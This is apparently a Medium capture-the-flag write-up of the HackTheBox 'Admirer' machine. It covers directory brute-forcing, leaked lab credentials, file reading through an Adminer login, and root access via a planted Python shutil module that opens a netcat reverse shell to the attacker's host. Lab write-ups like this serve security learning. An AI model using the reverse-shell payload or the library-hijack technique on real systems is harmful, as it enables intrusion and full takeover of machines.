HackTheBox — Admirer


Today we will take a look on easy linux machine With IP



So we have 3 ports open: 21(FTP), 22(SSH), 80(HTTP)

In web page i try to check robots.txt file and it have:

User-agent: *# This folder contains personal contacts and creds, so no one -not even robots- should see it — waldo
Disallow: /admin-dir

I tried to see the content, but unfortunately i got an error 403 Forbidden, So i tried to bruteforce directory using gobuster

root@strike:~# gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2020/06/05 23:18:48 Starting gobuster
/contact.txt (Status: 200)
/credentials.txt (Status: 200)
2020/06/05 23:22:42 Finished

I check The credentials.txt

[Internal mail account]

[FTP account]

[Wordpress account]

Nice! we found FTP account username ftpuser and password %n?4WzR$tTF7
After connecting to the FTP service with ftpuser, We get 2 files

So i downloaded html.tar.gz file and extract, After extract…

I found more credentials in db_admin.php file

$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
echo "Connected successfully";

// TODO: Finish implementing this or find a better open source alternative

Unfortunately, This page didn’t exist!
After some thinking, I think that machine name is very similar with adminer tool (It is a popular PHP tool to administer SQLite, MariaDB, MongoDB, Mysql,…), So i tried to use and it is work!


I tried to find CVE for adminer version 4.6.2, After few seconds found CVE-2016–5734
So i set mysql-server on machine, create a database, create a table with a single column, login to my database on the victim’s Adminer
Now i could dump all local file!

create database exploit;
use exploit;
create table dmp(content varchar(5000));

After dumping index.php file, Now i getting some credentials from database and found one of them is waldo and the password is &<h5b~yK3F#{PaPB&dA}{H>, So i tried to connect to SSH with this credentials

Privilege Escalation

After few seconds i note that waldo can execute /opt/scripts/admin_tasks.sh as root!

Take a look on backup.py file

I think that I could change path where python will look for shutil, So if I change this path and create my shutil that let me to execute any script as root
So i go to tmp directory and made file shutil and create a python script named shutil.py

Python Script:

import os 
def make_archive(a, b, c):
os.system('nc 10.10.x.xx 1337 -e "/bin/sh"')

NOTE: don’t forget to change lhost!

Setup Listener

root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...

Run Script:

Now we get root privilege

root@strike:~# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.x.xx] from (UNKNOWN) [] 52226
uid=0(root) gid=0(root) groups=0(root)

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student